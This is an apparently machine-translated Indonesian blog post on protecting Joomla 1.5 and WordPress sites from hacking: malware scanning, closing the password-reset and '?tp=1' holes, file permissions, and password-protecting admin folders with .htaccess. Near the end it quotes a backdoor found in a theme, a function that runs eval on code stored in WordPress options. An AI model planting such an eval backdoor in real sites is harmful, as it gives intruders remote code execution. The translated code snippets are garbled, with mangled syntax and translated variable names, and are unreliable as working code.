Tetap memantau beban di server secara konstan dan, ketika meningkat, mencari cangkang dan malware lain di antara file mesin, atau entah bagaimana memperkuat perlindungan. Untuk mencari malware, saya mengunduh file mesin ke komputer dan memeriksanya dengan DoctorWeb dan Aibolit. Yang pertama tidak menemukan segalanya, dan yang terakhir melihat musuh terlalu sering di tempat yang tidak ada, tetapi saya tidak tahu metode efektif lainnya. Meskipun ada juga lusinan program, tetapi ini sudah lebih nyaman bagi siapa saja.

Ngomong-ngomong, naskahnya Aibolit dapat bekerja tidak hanya di server, tetapi juga langsung di komputer di folder dengan file mesin yang diunduh (jangan lupa untuk mematikan antivirus standar saat mengunduh situs, karena dapat memperbaiki beberapa file, tetapi mereka akan tetap berada di server).

Instruksi terperinci diberikan dalam video di bawah ini, dan singkatnya, Anda mengunduh juru bahasa PHP dari situs web Microsoft dan menginstalnya. Setelah itu, buka file skrip Aibolit bernama ai-bolit.php menggunakan juru bahasa ini:

Kecepatan perayapan bergantung pada kecepatan komputer Anda dan jumlah file di mesin situs Anda. Saya butuh beberapa jam untuk situs https: //, karena bahkan Aibolit mencurigai gambar menyembunyikan virus, dan saya memiliki banyak gambar yang sama, dan file cache membutuhkan banyak waktu saat memindai. Untuk situs di Joomla 1.5, pemeriksaannya jauh lebih cepat.

Memutuskan untuk menghabiskan satu hari mencari cara untuk meningkatkan keamanan situs. Kami berhasil melakukan sedikit, tetapi masih lebih baik daripada tidak sama sekali. Mari kita mulai dengan memperkuat perlindungan (dari pengurangan kerentanan) dari dua situs di Joomla 1.5. Berikut ini telah dilakukan:


Bagaimana lagi melindungi Joomla 1.5 dari virus dan peretasan aliran

  1. Juga, "spesialis" memastikan bahwa situs di Joomla 1.5 rusak "pada satu atau dua" dengan menggunakan yang ada di mesin (melalui itu Anda dapat mengubah kata sandi admin). Meskipun Anda tidak menggunakan pendaftaran di situs Anda dan tidak menampilkan tautan untuk memulihkan di mana pun, ini tidak berarti Anda telah menutupi kerentanan ini. Cukup tambahkan cuplikan berikut ke url beranda situs Anda dan Anda akan mendapatkan fitur yang Anda cari: /index.php?option=com_user&view=reset

    Sebenarnya untuk menutup celah ini (tapi saya masih belum paham cara menggunakannya untuk hacking), anda cukup menghapus file ini:

    /components/com_user/models/reset.php Benar, setelah itu, tidak ada pengguna yang terdaftar di situs Anda yang dapat menggunakan fungsi pemulihan kata sandi, tetapi bagi saya itu tidak penting, karena pendaftaran tidak disediakan.

  2. Mereka juga mengatakan bahwa shnyag yang berguna seperti menambahkan ke alamat halaman juga memungkinkan penulis virus dan pemburu kebaikan orang lain untuk masuk ke beberapa area sensitif situs Anda dan membuatnya merusak, atau dengan cara lain menyalahgunakannya. Hal ini dihapus lagi dengan mengedit salah satu file mesin. /libraries/Joomla/application/module/helper.php

    Di sana Anda perlu menghapus dua potong kode, atau mengomentarinya dengan melampirkannya di /* dan */ (kode ini tidak akan dieksekusi oleh penerjemah bahasa). Cuplikan pertama adalah:

    If(count($result) == 0) ( if(JRequest::getBool("tp")) ( $result = JModuleHelper::getModule("mod_".$position); $result->title = $position; $hasil->isi = $posisi; $hasil->posisi = $posisi; ) )

    Dan yang kedua adalah:

    If(JRequest::getBool("tp")) ( $attribs["style"] .= " garis besar"; )

    Sebenarnya, setelah itu, Anda mereset cache dan mencoba melihat posisi modul di template Anda menggunakan konstruksi berikut:

    https://situs web/?tp=1

    Jika tidak berhasil, semoga Anda menutup lubang ini.

  3. Sangat sering, situs diretas bukan dari luar, tetapi dari dalam. Trojan dan keylogen di komputer Anda tahu apa yang harus dicari dan di mana, jadi jangan menyimpan kata sandi di klien FTP(ada opsi untuk digunakan untuk kasus ini) Bahkan lebih keren untuk menonaktifkan kemampuan untuk mengakses situs Anda melalui FTP, tetapi sebaliknya, di mana informasi yang dikirimkan (termasuk kata sandi) dienkripsi, yang membuatnya tidak berguna untuk mencegatnya. Sejujurnya, saya mengabaikan saran terakhir karena "kegelapan" saya. Ada juga opsi untuk mengonfigurasi akses ke situs Anda melalui FTP biasa hanya dari alamat IP tertentu (komputer Anda), tetapi ISP saya memiliki IP dinamis (berubah dalam kisaran tertentu).
  4. Juga saran mesin tidak lebih tinggi dari yang sebenarnya diperlukan untuk operasinya. Sebenarnya, saya tidak terlalu memikirkan untuk menyetelnya sesuai template: 755 untuk folder dan 644 untuk file. semuanya mungkin dengan bantuan Filezilla yang sama. Selain itu, hak ini harus diterapkan tidak hanya ke direktori folder root, tetapi juga ke semua direktori dan file yang ada di dalamnya.

    Saya menyetel hak ke 444 pada file di folder root, dan 705 pada direktori tmp dan log. Tentu saja, mungkin untuk "menjepit" lebih erat, tetapi saya tidak memiliki banyak pengalaman dalam hal ini, dan tidak ada waktu untuk membuang waktu untuk eksperimen. Dan selain itu, semua ini tidak akan menghalangi peretas secara serius, karena ada hal-hal yang dapat membatalkan semua upaya kami. Untuk melakukannya, gunakan perintah berikut:

    Oleh karena itu, untuk benar-benar "mengkonkretkan" file mesin Joomla 1.5 dari peretasan dan perambahan, perlu untuk melarang perubahan hak akses ke file dan folder melalui PHP. Ini dilakukan di pengaturan server, tapi saya belum tahu bagaimana dan di mana. Jika Anda tahu, silakan posting link.

  5. Semua hal di atas dirancang untuk mengurangi kemungkinan situs Anda diretas dan ditembus oleh cangkang dan malware lainnya. Namun, tindakan pencegahan yang dilakukan bukanlah jaminan, jadi ini akan sangat bagus di server (tempat situs Joomla 1.5 Anda berada). Ini akan menghilangkan semua hal negatif dari kejahatan yang bocor. Namun, secara pribadi, sekali lagi, saya belum menerapkan ini karena alasan "kegelapan" saya. Saya akan berterima kasih atas tautan ke materi yang menjelaskan proses ini.

    6. Sangat sering merusak situs, mendapatkan akses ke panel administrasi. Jelas bahwa itu dilindungi kata sandi, oleh karena itu, dengan menggunakan metode brute force (pemilihan cerdas), banyak, bahkan kata sandi yang tampaknya rumit dipecah menjadi satu atau dua. karena itu admin juga perlu dilindungi, dan lebih baik melakukannya bukan dengan bantuan ekstensi tambahan, tetapi dengan bantuan server. Ada beberapa opsi perlindungan. Misalnya, Anda dapat mengubah alamat URL panel admin dengan satu atau lain cara agar peretas tidak dapat memulai bisnis kotornya.

    Metode perlindungan lain, yang akan dijelaskan secara rinci di bawah ini, adalah dengan membuat penghalang tambahan di jalan penyusup (orang atau naskah yang masih hidup). Ini terdiri dari perlindungan kata sandi direktori dengan file admin (di Joomla ini adalah folder administrator, dan di WordPress - wp-admin) menggunakan server web. Ternyata saat mengakses panel admin, pertama-tama Anda harus memasukkan nama pengguna dan kata sandi untuk mengakses folder, dan baru kemudian nama pengguna dan kata sandi untuk mengakses, sebenarnya, panel admin mesin. Selain itu, dengan menembus garis pertahanan pertama menggunakan metode brute-force, malware tidak akan membuat beban tambahan yang signifikan di server, dan itu bagus.

  6. Catatan lain yang sangat penting, menurut saya, untuk meningkatkan keamanan situs Anda dari peretasan dan infeksi virus adalah dengan mengikuti aturan: satu situs - satu akun hosting. Ya, ini lebih mahal, tetapi jauh lebih aman. Saat ditempatkan di satu akun, semua situs Anda akan segera tersedia melalui FTP saat malware hanya mendapatkan akses ke salah satunya. Mereka merusak situs di mesin, dan tidak masuk akal untuk berharap skrip tidak naik ke pohon direktori. Selain itu, sangat sulit untuk menangani banyak situs pada satu akun hosting, karena dengan berurusan dengan satu situs Anda melupakan situs yang sudah sembuh, yang sedang terinfeksi saat itu.
  7. Omong-omong, mereka dapat merusak tidak hanya dari situs Anda sendiri, tetapi juga dari situs tetangga hosting Anda, jika pemiliknya tidak berhati-hati dalam mengecualikan kemungkinan ini. Mereka juga dapat meretas panel hosting (seperti,), tetapi bagaimanapun juga, jumlah peretasan karena kesalahan penghosting dapat diabaikan dibandingkan dengan jumlah peretasan karena kecerobohan pemilik situs.

Bagaimana cara melindungi area admin situs Anda dari peretasan?

Saya ingin berbicara secara detail tentang metode perlindungan yang baru-baru ini saya gunakan sendiri. Itu termasuk dalam menolak akses ke folder tempat file panel administratif situs berada. Larangan diatur menggunakan file .htaccess yang luar biasa, yang, pada kenyataannya, memungkinkan Anda untuk mengontrol pengaturan server web tempat situs Anda diinstal dari jarak jauh. Pada saat yang sama, dia tahu bagaimana melakukannya secara selektif.

Semua arahan yang ditulis dalam .htaccess hanya akan berlaku untuk direktori tempatnya berada. Apakah Anda ingin mengubah sesuatu di pengaturan untuk seluruh situs? Letakkan kemudian .htaccess di folder root. Yah, kami tertarik dengan pengaturan hanya tentang folder dengan file panel admin, jadi kami akan meletakkannya di sana. Di Joomla ini akan menjadi folder administrator, di WordPress akan menjadi wp-admin.

Namun, satu .htaccess tidak cukup bagi kami. Anda juga harus menggunakan .htpasswd, di mana login dan kata sandi akan disimpan untuk mengakses folder administratif ini. Apalagi kata sandi akan disimpan bukan dalam bentuk terbuka, melainkan dalam bentuk sandi MD5. Ini tidak akan berhasil memulihkan kata sandi dengan menggunakannya, tetapi ketika Anda memasukkan kombinasi yang benar di bidang kata sandi, server web akan menghitung jumlah MD5 untuk kombinasi ini dan membandingkannya dengan apa yang disimpan di .htpasswd. Jika data cocok, maka Anda akan diizinkan masuk ke area admin Joomla atau WordPress, dan jika tidak, maka mereka tidak akan diizinkan masuk.

Itu saja, tinggal menghidupkan rencana itu saja. Anda perlu menambahkan beberapa arahan ke .htaccess. Apakah kamu tahu? Aku tidak tahu. Ya, dan entah bagaimana Anda perlu menyalip kata sandi dalam urutan MD5. Masalah. Namun, ia memiliki solusi yang cukup sederhana. Orang baik mengatur layanan online untuk menghasilkan konten untuk file .htaccess dan file .htpasswd berdasarkan login dan kata sandi yang Anda buat. Benar, Anda juga harus menentukan jalur absolut ke folder administratif, tetapi ini sudah sepele.

Jadi, temui - yang hebat dan mengerikan generator perlindungan untuk panel admin situs Anda. Bisa dimengerti, bukan? Munculkan, dan yang terbaik dari semuanya, buat dua kombinasi huruf, angka, dan tanda yang paling rumit, lalu masukkan ke dalam dua bidang teratas. Jangan lupa untuk menuliskannya, atau mendorongnya ke pengelola kata sandi, jika tidak, Anda tidak akan dapat masuk ke panel admin sendiri dan Anda harus mulai melakukan semua yang dijelaskan di bagian ini lagi.

Disini sekarang. Apakah Anda tahu yang ini? Bahkan jika Anda tidak tahu, jangan khawatir. Sambungkan ke situs melalui FTP, buat file dengan nama apa pun di akarnya (ya, bahkan dengan url_path.php ini) dan tambahkan kode sederhana ini ke dalamnya:

"; echo "Path lengkap ke skrip dan namanya: ".$_SERVER["SCRIPT_FILENAME"]."
"; echo "Nama skrip: ".$_SERVER["SCRIPT_NAME"]; ?>

Lalu buka browser dan masukkan URL ini di bilah alamat (tentu saja dengan domain Anda):

https://situs/url_path.php

Hasilnya, Anda akan melihat jalur absolut yang sama dengan yang Anda minati. Masukkan di file generator .htaccess dan .htpasswd di atas. Jangan lupa untuk menambahkan di akhir jalur ini nama folder administrator atau wp-admin tanpa garis miring. Itu saja, sekarang klik tombol "Hasilkan".

Dan pada gilirannya mentransfer konten untuk file .htaccess dan .htpasswd langsung ke file yang sama.

Saya harap Anda sudah membuatnya di folder administrator atau wp-admin (tergantung pada mesin yang Anda gunakan)?

Nah, sekarang coba masuk ke panel admin. Sebuah jendela muncul meminta Anda untuk memasukkan nama pengguna dan kata sandi dari server web Anda? Itu ditampilkan secara berbeda di browser yang berbeda, tetapi di Chrome tampilannya seperti ini:

Jika ada sesuatu yang tidak menempel, maka "asap" jalur absolut ke .htpasswd, yang ditentukan dalam file .htaccess. Dalam hal ini, perbaiki secara manual saat mengedit file. Hanya itu yang ingin saya sampaikan kepada Anda hari ini. Jika Anda ingin memarahi atau menambahkan sesuatu, pergilah.

Virus di WordPress?

Setelah menulis artikel ini, saya menemukan malware di blog saya (https: // situs) (atau sesuatu yang dipasang tanpa keinginan saya). Saya hanya ingin mengubah sesuatu dalam kode dan masuk ke . Di bagian paling bawah, tepat sebelum tag Body, saya dikejutkan oleh panggilan ke beberapa fungsi yang tidak saya kenal (dengan namanya, tetapi saya tidak menemukan sesuatu yang berharga):

Nama itu tampaknya masuk akal. Hebatnya, tiga minggu sebelumnya, saya tidak sengaja menemukan bahwa saya memiliki tabel baru di database dua blog WordPress saya (https://site dan lainnya). Namanya luar biasa - wp-config. Googling untuk nama ini lagi tidak memberikan sesuatu yang berharga, karena semua jawaban terkait dengan file wp-config.php dengan nama yang sama.

Ukuran tabel ini dengan cepat bertambah (hingga ratusan megabyte di https: // situs) dan alamat halaman situs saya dengan berbagai parameter ditulis ke dalamnya. Tidak memahami inti dari proses ini, saya baru saja menghancurkan meja ini dan hanya itu. Ngomong-ngomong, saya punya blog lain di WordPress, tetapi tidak ada yang seperti ini yang terlihat di sana.

Nah, di sini saya menemukan sisipan "berbicara" dalam topik tersebut. Saya juga memutuskan untuk melihat apakah ada sesuatu yang ditambahkan di sana yang sesuai dengan baris yang dijelaskan di atas di bagian bawah footer. Ternyata ditambahkan. Dan sangat rapi - baik di bagian paling atas, maupun di bagian paling bawah, tetapi fungsi tertulis kedua (atau ketiga) dari atas:

Fungsi wp_custom_page_links_return() ( $option = get_option("wp_custom_page_links"); @eval($option); ) @eval(get_option("wp_brlinks"));

Di sinilah "eval" yang indah menarik perhatian Anda. Hebatnya, Aibolit (dijelaskan di atas) menganggap fragmen ini mencurigakan, tetapi saya belum mendapatkannya, karena skrip ini sudah mencurigai banyak orang tidak dapat diandalkan. Saya juga mencari di Google tentang kode ini dan menemukan postingan (sayangnya, sekarang domain tersebut diblokir karena tidak membayar) dengan deskripsi masalah serupa. Seorang teman membocorkan kotoran ini dengan topik baru, di mana semacam kode instalasi dijahit.

Saya memiliki topik di kedua blog yang terinfeksi telah berdiri selama bertahun-tahun. Mungkin, ada semacam kerentanan di mesin atau, yang dimanfaatkan oleh para simpatisan dengan cepat (on the stream). Secara umum, periksa sendiri tidak adanya inklusi tersebut. Tanggal perubahan file yang dijelaskan jatuh, menurut saya, pada pertengahan September tahun ini.

Saya menyarankan Anda untuk juga melihat pilihan 17 video tutorial mengamankan situs di Joomla. Mereka akan bermain satu demi satu secara otomatis, dan jika mau, Anda dapat beralih ke pelajaran berikutnya menggunakan tombol yang sesuai di panel pemain atau memilih pelajaran yang diinginkan dari menu drop-down di sudut kiri atas jendela pemain:

Selamat menonton!

Semoga beruntung untukmu! Sampai jumpa di halaman blog situs

Anda mungkin tertarik

Situs Joomla mulai mengeluarkan banyak kesalahan seperti - Standar Ketat: Metode non-statis JLoader::import () tidak boleh dipanggil secara statis di
Perbarui Joomla ke versi terbaru
Membuat peta untuk situs Joomla menggunakan komponen Xmap
Apa itu Joomla
Grup pengguna di Joomla, pengaturan caching, dan masalah pengiriman email dari situs
Komponen K2 untuk membuat blog, katalog, dan portal di Joomla - fitur, instalasi, dan Russification
Modul di Joomla - lihat posisi, konfigurasi dan keluaran, serta menetapkan akhiran kelas
Cara memutakhirkan situs Html statis ke situs dinamis di Joomla
Menginstal WordPress secara detail dan gambar, masuk ke panel admin WP dan mengubah kata sandi
Plugin Joomla - TinyMCE, Load Module, Legacy, dan lainnya diinstal secara default



ARTIKEL TERKAIT